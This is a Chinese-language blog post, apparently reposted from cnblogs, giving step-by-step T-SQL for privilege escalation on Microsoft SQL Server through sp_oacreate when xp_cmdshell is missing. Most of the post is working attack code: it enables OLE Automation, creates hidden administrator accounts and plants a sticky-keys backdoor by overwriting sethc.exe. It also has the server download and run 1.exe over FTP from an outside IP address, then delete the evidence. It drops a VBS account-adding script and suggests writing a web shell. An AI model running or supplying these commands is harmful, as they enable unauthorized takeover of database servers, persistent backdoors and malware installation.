SP_OACreate提权经验

zoukankan html css js c++ java

SP_OACreate提权经验

在xp_cmdshell被删除或者出错情况下，可以充分利用SP_OACreate进行提权

首先

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE WITH OVERRIDE;

EXEC sp_configure 'Ole Automation Procedures', 1;

RECONFIGURE WITH OVERRIDE;

EXEC sp_configure 'show advanced options', 0;

打开组件，2005中默认关闭

1）直接加用户

2000系统：

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net user 123 123 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net localgroup administrators 123/add'



xp和2003系统：

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user 123$ 123/add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup administrators 123$ /add'



2）粘贴键替换

declare @o int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe';

declare @o int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'copyfile',null,'c:windowssystem32sethc.exe' ,'c:windowssystem32dllcachesethc.exe';

需要同时具备sp_oacreate 和sp_oamethod 两个功能组件

3）直接传马

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%system32cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'--

4）启动项写入加账户脚本

declare @sp_passwordxieo int, @f int, @t int, @ret int

exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out

exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:RECYCLER1.vbs', 1

exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'

exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';

5）如果该服务器有网站，则直接用方法4）写入一句话

查看全文

相关阅读:
react给input元素中文输入的时候自动转成字符串bug
charles代理
 es6和es5函数参数和arguments的差别
 Uncaught InvalidStateError: Failed to set the 'value' property on 'HTMLInputElement': This input element accepts a filename, which may only be programmatically set to the empty string.
Node 开发概述
 对Flutter路由管理库Fluro的封装
 Flutter 切换标签显示对应的列表+Provide状态管理实例
 Flutter 商城实例分类列表
 Flutter 入口页面及底部导航栏实例制作
 Flutter 建立项目和编写入口文件

原文地址：https://www.cnblogs.com/xishaonian/p/7421592.html